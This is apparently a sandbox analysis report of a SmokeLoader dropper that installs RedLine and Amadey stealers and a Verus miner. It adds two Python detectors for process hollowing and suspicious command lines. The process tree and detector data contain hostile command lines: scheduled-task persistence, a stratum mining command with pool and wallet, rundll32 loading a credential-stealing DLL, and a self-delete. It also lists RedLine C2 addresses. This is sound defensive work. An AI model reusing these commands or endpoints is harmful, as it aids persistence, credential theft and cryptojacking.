Analysis
max time kernel: 143s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system
submitted: 01/11/2022, 11:41
Static task: static1
Behavioral task: behavioral1
  Sample: 6ddf800f1c10179bdbe0e543c6641349.exe
  Resource: win7-20220901-en
Behavioral task: behavioral2 (the run reported below)
  Sample: 6ddf800f1c10179bdbe0e543c6641349.exe
  Resource: win10v2004-20220901-en
General
Target: 6ddf800f1c10179bdbe0e543c6641349.exe
Size: 321KB
MD5: 6ddf800f1c10179bdbe0e543c6641349
SHA1: e3e326b2ee9dc20c7a82920f8a8b67bac2350472
SHA256: ca19c8ccb6a6b25ef286ee0f5a82abc186290cbacd427371584ce2ac65501d9c
SHA512: 3b9a8ae3162cc3db87889a63ca1949170ce0672f3cffc8eeabbc3d027a5e0bb53557e9f616bbb7e912716d1fd4a4b16b7f2e61a887c81b8f3e300d2a64087f7d
SSDEEP: 3072:d9NwJSdDV5Uu4vG9AN6cqY0l+qeDQlsAlaA3RvLSSuUX+VggjcGkNIVqIh7:lwJSd4B+RcJLQbPhvLSSuUm7ITsq
Malware Config
Extracted
  Family: redline
  Botnet: slovarik15btc
  C2: 78.153.144.3:2510
  auth_value: bfedad55292538ad3edd07ac95ad8952
Extracted
  Family: redline
  Botnet: Google2
  C2: 167.235.71.14:20469
  auth_value: fb274d9691235ba015830da570a13578
Signatures

DcRat
DarkCrystal (DC) is a .NET RAT, active since June 2019, capable of loading additional plugins.

Detect Amadey credential stealer module 2 IoCs
resource                                       yara_rule
behavioral2/files/0x000f00000001f020-268.dat   amadey_cred_module
behavioral2/files/0x000f00000001f020-269.dat   amadey_cred_module

Detects Smokeloader packer 1 IoCs
resource                                                                       yara_rule
behavioral2/memory/4348-133-0x00000000001F0000-0x00000000001F9000-memory.dmp   family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload 2 IoCs
resource                                                                       yara_rule
behavioral2/memory/1632-140-0x0000000000400000-0x0000000000428000-memory.dmp   family_redline
behavioral2/memory/4024-243-0x0000000000600000-0x0000000000628000-memory.dmp   family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Blocklisted process makes network request 1 IoCs
flow   pid    Process
49     3860   rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 10 IoCs
pid    Process
4488   4362.exe
4812   539F.exe
3372   57A7.exe
3104   5A58.exe
4176   sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe
2228   66AD.exe
4312   69DB.exe
1744   LYKAA.exe
2124   rovwer.exe
3488   rovwer.exe

UPX packed file 4 IoCs
resource                                                                       yara_rule
behavioral2/files/0x000c00000001e806-178.dat                                   upx
behavioral2/files/0x000c00000001e806-179.dat                                   upx
behavioral2/memory/2228-184-0x0000000000220000-0x0000000000A09000-memory.dmp   upx
behavioral2/memory/2228-237-0x0000000000220000-0x0000000000A09000-memory.dmp   upx
Checks computer location settings 2 TTPs 4 IoCs
Looks up the country code configured in the registry, likely a geofence check.
description         ioc                                                                                                   Process
Key value queried   \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation   5A58.exe
Key value queried   \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation   LYKAA.exe
Key value queried   \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation   69DB.exe
Key value queried   \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation   rovwer.exe

Loads dropped DLL 4 IoCs
pid    Process
4640   InstallUtil.exe
4640   InstallUtil.exe
4640   InstallUtil.exe
3860   rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and other profile data.

Uses the VBS compiler for execution 1 TTPs
vbc.exe, the Visual Basic .NET compiler, is started by the droppers only to host injected code: the RedLine payloads run inside PIDs 1632 and 4024 and the miner inside PID 5024 (see the process tree).

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
description   ioc                                                                                                                                                   Process
Key opened    \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook   rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Suspicious use of SetThreadContext 4 IoCs
A parent that writes into a child it created and then resets the child's thread context is performing process hollowing; each row pairs a dropper with the .NET framework binary (vbc.exe or InstallUtil.exe) it targets.
description                           pid    Process     procid_target
PID 4488 set thread context of 1632   4488   4362.exe    93
PID 4812 set thread context of 4640   4812   539F.exe    99
PID 3372 set thread context of 4024   3372   57A7.exe    126
PID 1744 set thread context of 5024   1744   LYKAA.exe   127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Common in ransomware, but infostealers also enumerate drives when collecting files.

Program crash 2 IoCs
pid    pid_target   Process        procid_target
4712   4312         WerFault.exe   104
1676   3488         WerFault.exe   125

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description      ioc                                               Process
Key enumerated   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   6ddf800f1c10179bdbe0e543c6641349.exe
Key opened       \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   6ddf800f1c10179bdbe0e543c6641349.exe
Key queried      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   6ddf800f1c10179bdbe0e543c6641349.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid    Process
2572   schtasks.exe
1500   schtasks.exe

Delays execution with timeout.exe 1 IoCs
pid    Process
4396   timeout.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid    Process                                entries
4348   6ddf800f1c10179bdbe0e543c6641349.exe   2
2756   Process not Found                      62

Suspicious behavior: MapViewOfSection 19 IoCs
pid    Process                                entries
4348   6ddf800f1c10179bdbe0e543c6641349.exe   1
2756   Process not Found                      18

Suspicious use of AdjustPrivilegeToken 64 IoCs
description               pid    Process
Token: SeDebugPrivilege   4176   sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe
Token: SeDebugPrivilege   1744   LYKAA.exe
Token: SeDebugPrivilege   1632   vbc.exe
Token: SeDebugPrivilege   4024   vbc.exe
The remaining 60 entries alternate Token: SeShutdownPrivilege and Token: SeCreatePagefilePrivilege for PID 2756 (Process not Found).

Suspicious use of WriteProcessMemory 64 IoCs
Identical rows are collapsed; "entries" is how many times the row appears in the listing.
pid    Process                                                       target pid   procid_target   entries
2756   Process not Found                                             4488         90              3
4488   4362.exe                                                      1632         93              5
2756   Process not Found                                             4812         94              3
2756   Process not Found                                             3372         95              3
2756   Process not Found                                             3104         97              2
3104   5A58.exe                                                      4176         98              2
4812   539F.exe                                                      4640         99              8
4176   sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe   4632         100             2
4632   cmd.exe                                                       4396         102             2
2756   Process not Found                                             2228         103             2
2756   Process not Found                                             4312         104             3
2228   66AD.exe                                                      4308         105             2
2756   Process not Found                                             1480         107             4
4632   cmd.exe                                                       1744         108             2
2756   Process not Found                                             4636         109             3
1744   LYKAA.exe                                                     3892         110             2
2756   Process not Found                                             1296         112             4
3892   cmd.exe                                                       2572         113             2
2756   Process not Found                                             4808         114             3
2756   Process not Found                                             1488         115             4
4312   69DB.exe                                                      2124         116             3
PID 2756 (reported as Process not Found) is the unresolved parent that starts every dropped EXE (4488, 4812, 3372, 3104, 2228, 4312) and the explorer.exe instances (1480, 4636, 1296, 4808, 1488); that is why those processes appear at the top level of the process tree without a parent.
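The SetThreadContext rows, read together with the WriteProcessMemory rows, show the process-hollowing sequence: each dropper (4362.exe, 539F.exe, 57A7.exe, LYKAA.exe) starts a .NET framework utility (vbc.exe or InstallUtil.exe), writes into it and resets its thread context, and the RedLine payload is then found in the memory of the hollowed vbc.exe processes 1632 and 4024. The Python below is an added example, not part of this report or of any sandbox's code, that correlates the two tables into a hollowing finding. The rows and image paths are copied from this report; the HOLLOW_HOSTS watch-list and the high/medium confidence tiers are assumptions made for the example.

```python
import re

# Rows copied from the "Suspicious use of SetThreadContext" and
# "Suspicious use of WriteProcessMemory" tables of this report (a subset:
# the report truncates the WriteProcessMemory listing at 64 IoCs).
SET_THREAD_CONTEXT_ROWS = [
    "PID 4488 set thread context of 1632 4488 4362.exe 93",
    "PID 4812 set thread context of 4640 4812 539F.exe 99",
    "PID 3372 set thread context of 4024 3372 57A7.exe 126",
    "PID 1744 set thread context of 5024 1744 LYKAA.exe 127",
]
WRITE_PROCESS_MEMORY_ROWS = [
    "PID 2756 wrote to memory of 4488 2756 Process not Found 90",
    "PID 4488 wrote to memory of 1632 4488 4362.exe 93",
    "PID 4812 wrote to memory of 4640 4812 539F.exe 99",
    "PID 3104 wrote to memory of 4176 3104 5A58.exe 98",
    "PID 4632 wrote to memory of 1744 4632 cmd.exe 108",
]
# Child image paths, keyed by PID, taken from the process tree of this report.
CHILD_IMAGES = {
    1632: r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
    4640: r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
    4024: r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
    5024: r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
    4488: r"C:\Users\Admin\AppData\Local\Temp\4362.exe",
}
# .NET framework utilities that crypters routinely start suspended and
# overwrite. Assumption: a watch-list chosen for this example, not report data.
HOLLOW_HOSTS = {"vbc.exe", "installutil.exe", "regasm.exe", "regsvcs.exe",
                "msbuild.exe", "applaunch.exe", "aspnet_compiler.exe"}

# Row grammar: "PID <parent> <verb> <child> <parent> <parent image> <procid_target>".
_STC = re.compile(r"^PID (\d+) set thread context of (\d+) \1 (.+?) (\d+)$")
_WPM = re.compile(r"^PID (\d+) wrote to memory of (\d+) \1 (.+?) (\d+)$")


def parse_rows(rows, pattern):
    """Return {(parent_pid, child_pid): parent_image}; malformed rows are skipped."""
    pairs = {}
    for row in rows:
        m = pattern.match(row.strip())
        if m:
            pairs[(int(m.group(1)), int(m.group(2)))] = m.group(3)
    return pairs


def detect_hollowing(stc_rows, wpm_rows, child_images):
    """Correlate SetThreadContext with WriteProcessMemory per (parent, child).

    Create-suspended, write payload, set the primary thread's context, resume
    is the process-hollowing sequence. WriteProcessMemory on its own is also
    part of ordinary process start-up, so it is never flagged alone; a context
    switch into a .NET host is flagged even when the matching write was lost
    to the report's truncation, at lower confidence.
    """
    stc = parse_rows(stc_rows, _STC)
    wpm = parse_rows(wpm_rows, _WPM)
    findings = []
    for (parent, child), parent_image in stc.items():
        child_image = child_images.get(child, "<unknown>")
        if child_image.rsplit("\\", 1)[-1].lower() not in HOLLOW_HOSTS:
            continue
        findings.append({
            "parent_pid": parent, "parent_image": parent_image,
            "child_pid": child, "child_image": child_image,
            "confidence": "high" if (parent, child) in wpm else "medium",
        })
    return sorted(findings, key=lambda f: f["child_pid"])


if __name__ == "__main__":
    for f in detect_hollowing(SET_THREAD_CONTEXT_ROWS, WRITE_PROCESS_MEMORY_ROWS, CHILD_IMAGES):
        print(f"{f['confidence']:<6} {f['parent_image']} ({f['parent_pid']}) "
              f"-> {f['child_image']} ({f['child_pid']})")
```

On the rows above this yields two high-confidence pairs (4362.exe into vbc.exe 1632, 539F.exe into InstallUtil.exe 4640) and two medium ones (57A7.exe into vbc.exe 4024, LYKAA.exe into vbc.exe 5024) whose writes fell outside the truncated listing; the PID 2756 rows are plain process creation and are not reported.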
outlook_win_path 1 IoCs
description   ioc                                                                                                                                                   Process
Key opened    \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook   rundll32.exe
Processes
Indentation shows parent/child depth; "cmd:" is given only where the command line carries arguments.

C:\Users\Admin\AppData\Local\Temp\6ddf800f1c10179bdbe0e543c6641349.exe (PID 4348)
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\4362.exe (PID 4488)
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe (PID 1632)
      - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\539F.exe (PID 4812)
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 4640)
      - Loads dropped DLL

C:\Users\Admin\AppData\Local\Temp\57A7.exe (PID 3372)
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe (PID 4024)
      - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\5A58.exe (PID 3104)
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe (PID 4176)
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe (PID 4632)
          cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6040.tmp.bat""
          - Suspicious use of WriteProcessMemory
            C:\Windows\system32\timeout.exe (PID 4396)
              cmd: timeout 3
              - Delays execution with timeout.exe
            C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe (PID 1744)
              - Executes dropped EXE
              - Checks computer location settings
              - Suspicious use of SetThreadContext
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
                C:\Windows\System32\cmd.exe (PID 3892)
                  cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\system32\schtasks.exe (PID 2572)
                      cmd: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
                      - Creates scheduled task(s)
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (PID 5024)
                  cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
                    C:\Windows\system32\cmd.exe (PID 1828)
                      cmd: C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\AppData\Local\Temp\66AD.exe (PID 2228)
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 4308)
      cmd: cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\66AD.exe"

C:\Users\Admin\AppData\Local\Temp\69DB.exe (PID 4312)
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe (PID 2124)
      - Executes dropped EXE
      - Checks computer location settings
        C:\Windows\SysWOW64\schtasks.exe (PID 1500)
          cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\rundll32.exe (PID 3860)
          cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main
          - Blocklisted process makes network request
          - Loads dropped DLL
          - Accesses Microsoft Outlook profiles
          - outlook_win_path
    C:\Windows\SysWOW64\WerFault.exe (PID 4712)
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1140
      - Program crash

C:\Windows\SysWOW64\explorer.exe (PID 1480)
C:\Windows\explorer.exe (PID 4636)
C:\Windows\SysWOW64\explorer.exe (PID 1296)
C:\Windows\explorer.exe (PID 4808)
C:\Windows\SysWOW64\explorer.exe (PID 1488)
C:\Windows\SysWOW64\WerFault.exe (PID 3440)
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4312 -ip 4312
C:\Windows\SysWOW64\explorer.exe (PID 3220)
C:\Windows\SysWOW64\explorer.exe (PID 1756)
C:\Windows\explorer.exe (PID 1528)
C:\Windows\SysWOW64\explorer.exe (PID 4160)

C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe (PID 3488)
  - Executes dropped EXE
    C:\Windows\SysWOW64\WerFault.exe (PID 1676)
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 420
      - Program crash

C:\Windows\SysWOW64\WerFault.exe (PID 884)
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3488 -ip 3488
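The command lines in the tree carry the indicators a responder acts on: two schtasks persistence entries (LYKAA every 5 minutes at the highest run level from ProgramData, rovwer.exe every minute from Temp), a stratum mining command running inside the hollowed vbc.exe 5024, a dropper deleting itself with cmd /c del, and rundll32 loading cred64.dll from AppData\Roaming with export Main. The Python below is an added example, not part of this report, that runs a small rule set over those command lines and explains each hit. The command lines are copied from the tree above; the rule thresholds (a /mo of 5 minutes or less, the USER_WRITABLE directory list, the DOTNET_HOSTS list) are assumptions made for the example.

```python
import re

# Command lines copied from the process tree of this report, as (PID, command
# line). WerFault and explorer.exe nodes are left out: no arguments of interest.
COMMAND_LINES = [
    (3892, r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 '
           r'/RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"'),
    (1500, r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe '
           r'/TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F'),
    (5024, r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus '
           r'-o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6'),
    (4308, r'cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\66AD.exe"'),
    (3860, r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main'),
    (4396, r'timeout 3'),
]
# Assumptions for this example: directories an unprivileged user can write to,
# and .NET framework tools that only run code a crypter hands them.
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
DOTNET_HOSTS = {"vbc.exe", "installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}
_STRATUM = re.compile(r"stratum\+(?:tcp|ssl)://([^\s:/]+)(?::(\d+))?", re.IGNORECASE)
_RUNDLL = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)"?\s*,\s*(\S+)', re.IGNORECASE)
_DEL = re.compile(r'/c\s+"?del\s+(?:/[a-z]\s+)*"?([^"]+?\.exe)', re.IGNORECASE)


def _image_name(cmd):
    """Basename of the first token (quoted or bare), lower-cased."""
    m = re.match(r'"([^"]+)"|(\S+)', cmd)
    return (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()


def _switch(cmd, name):
    """Value of a schtasks-style /name switch (quoted or bare), or None."""
    m = re.search(rf'/{name}\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def triage_schtasks(pid, cmd):
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmd, re.IGNORECASE):
        return None
    action, reasons = _switch(cmd, "tr") or "", []
    minutes = _switch(cmd, "mo") or ""
    if (_switch(cmd, "sc") or "").upper() == "MINUTE" and minutes.isdigit() and int(minutes) <= 5:
        reasons.append(f"re-launched every {minutes} minute(s) (watchdog persistence)")
    if (_switch(cmd, "rl") or "").upper() == "HIGHEST":
        reasons.append("requests the highest run level")
    if any(d in action.lower() for d in USER_WRITABLE):
        reasons.append("task action lives in a user-writable directory")
    return {"pid": pid, "rule": "schtasks_persistence", "task": _switch(cmd, "tn"),
            "action": action, "reasons": reasons}


def triage_miner(pid, cmd):
    m = _STRATUM.search(cmd)
    if not m:
        return None
    host = _image_name(cmd)
    algo = re.search(r"\s-a\s+(\S+)", cmd)
    wallet = re.search(r"\s-u\s+(\S+)", cmd)
    reasons = ["stratum pool URL on the command line"]
    if host in DOTNET_HOSTS:
        reasons.append(f"{host} is a .NET SDK tool, so the miner was injected into it")
    return {"pid": pid, "rule": "stratum_miner", "host_process": host,
            "pool": m.group(1), "port": int(m.group(2)) if m.group(2) else None,
            "algo": algo.group(1) if algo else None,
            "wallet": wallet.group(1) if wallet else None, "reasons": reasons}


def triage_self_delete(pid, cmd):
    m = _DEL.search(cmd)
    if not m:
        return None
    return {"pid": pid, "rule": "self_delete", "target": m.group(1),
            "reasons": ["cmd /c del on an executable (dropper removing itself)"]}


def triage_rundll32(pid, cmd):
    m = _RUNDLL.search(cmd)
    if not m:
        return None
    dll, export = m.group(1), m.group(2)
    reasons = [f"rundll32 invoking export {export}"]
    if any(d in dll.lower() for d in USER_WRITABLE):
        reasons.append("DLL loaded from a user-writable directory")
    return {"pid": pid, "rule": "rundll32_user_dll", "dll": dll, "export": export, "reasons": reasons}


RULES = (triage_schtasks, triage_miner, triage_self_delete, triage_rundll32)


def triage(command_lines):
    """Run every rule over every command line; one finding per hit, in tree order."""
    findings = []
    for pid, cmd in command_lines:
        for rule in RULES:
            hit = rule(pid, cmd)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in triage(COMMAND_LINES):
        print(f"PID {f['pid']:<5} {f['rule']:<22} " + "; ".join(f["reasons"]))
```

The rules key on argument shape rather than on file names, so the same code flags a renamed task or a miner hosted in RegAsm.exe; "timeout 3" produces no finding, which is intended: the sleep is only interesting in context, and the tree already records it under "Delays execution with timeout.exe".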
Network
MITRE ATT&CK Enterprise v6
Downloads
Files with identical hashes are listed once; the count in parentheses is how many entries share that hash.

Filesize: 837KB (4 entries)
MD5: 9796f845b710c1e68ee9f93592503665
SHA1: 9be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51
SHA256: 2c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f
SHA512: c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135

Filesize: 612KB
MD5: f07d9977430e762b563eaadc2b94bbfa
SHA1: da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA256: 4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA512: 6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Filesize: 1.9MB
MD5: f67d08e8c02574cbc2f1122c53bfb976
SHA1: 6522992957e7e4d074947cad63189f308a80fcf2
SHA256: c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA512: 2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Filesize: 1.0MB
MD5: dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1: bbac1dd8a07c6069415c04b62747d794736d0689
SHA256: 47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512: b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Filesize: 2KB
MD5: 5c9237df35c69a284b3cfd66970ce736
SHA1: 6c25b1319637046c663d18e36bdafbb6f5cadf00
SHA256: b4a0eea59921d24fe0f743c96ed5322c79af4c22d37c16f62bdba777c6be717e
SHA512: 01dcd3afd5f4d395299ad2b8f8c41c1b39422486274d0a95c0f4e187b38d75ff40fce896815fa9dc05b2d66403ae83a697cb43927271f0eb1de28d78163dcc06

Filesize: 366KB (2 entries)
MD5: 287572edc287d01d1e625d3b93efa326
SHA1: 1ed75fcfe9a37ba94ab8c59bf5048b1a85932857
SHA256: b6c62694edd72c240d022a7a33276ee091fa986437f571c50a34fd67c9b44e45
SHA512: 02994440785ec5347fd4f0895d674456f360ef43bc2ed96502cce72210600ff0af912ce169d66716893ccdb1a6894d2a7c2c6715b0652178fbb0535962e170e9

Filesize: 1.2MB (2 entries)
MD5: b67545f8f9bcc95c2efca01d65d4c429
SHA1: 062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf
SHA256: 5c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4
SHA512: 4ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563

Filesize: 366KB (2 entries)
MD5: b6f73df0d1c7d5fef86b5f3034767901
SHA1: 0bc4f94c5100cbfae5c520ca7b541c3c86d528f3
SHA256: 82a405a195eb3815d8a5ead1c6271cb279f7dbc11abebb7129b59561ad36e4b2
SHA512: 196c7c0321c6f35f9222d278fa226c9a5b28d5bdb22636be1a365db3f18d37c12371dff9881324244bd284cc764e257744b1d134860ce4485d4b3c8dc74b5f8a

Filesize: 1.1MB (2 entries)
MD5: 3cbeec829f400bbc837e6cedf044a6cb
SHA1: b6906942e53a1482069c123ca7f127cdf50c25fc
SHA256: f2ba48f9b1da2b3971f2e70b772a4d6fc503eb4b890fca1923b322687b77dd9f
SHA512: 285f08009934e530ef37b1c98097e7ab1134943e0796fbc0413883e367110aa1d4f14f5ed242b9386d8677e2cbc3000bbe3ccea5ac27b0aa72128425c8106806

Filesize: 2.8MB (2 entries)
MD5: e654228f62c81cfa6da658858a46ccff
SHA1: 6926e074d206a7f1bdab2a5c4f374c75338a4a93
SHA256: e22ad0212d094263e07e449bb8370760dbeed1a89ad76b485ea7f072694d4003
SHA512: bd2dbe69fc707b3090625af3a7dd226060712f2185a0ffdfa9229ccca085e4159b3832cb0ac45c9d80cd3f8521a89164a150966fbbee210c984e24ffb4b75a0a

Filesize: 359KB (5 entries)
MD5: 2d71178035cc220c79f00a8fdd2df64b
SHA1: fb289a0637c798844126c4ee726f013b9b971270
SHA256: 58036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11
SHA512: 4d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf

Filesize: 153B
MD5: 703041446bd3c027996cb1ab7516c12c
SHA1: fa5e48b8f223e1bce1ca6dcba0863e4c130bbdd0
SHA256: 7f56ffa303d1add0a1184f224edc7dc221cafd46428c24940241be6d6f3ac9d0
SHA512: 22632b16e3acd3753721b10568ac554e60185f11efc13f28eb275e105dbe4e0d07e0f2055c5685a037102b02b2ec4b15e066955bcc902257fd25a24fff1456cd

Filesize: 126KB (2 entries)
MD5: 522adad0782501491314a78c7f32006b
SHA1: e487edceeef3a41e2a8eea1e684bcbc3b39adb97
SHA256: 351fd9b73fa0cbbdfbce0793ca41544f5191650d79317a34024f3c09f73ac9ba
SHA512: 5f8a103deea3ed5f8641d1f4c91a4f891a8208b679cadbfac4a068afbad0d2f777cd29ace4bdfec590e722435473e4f8465fb80d5cda792dc0236646580101a7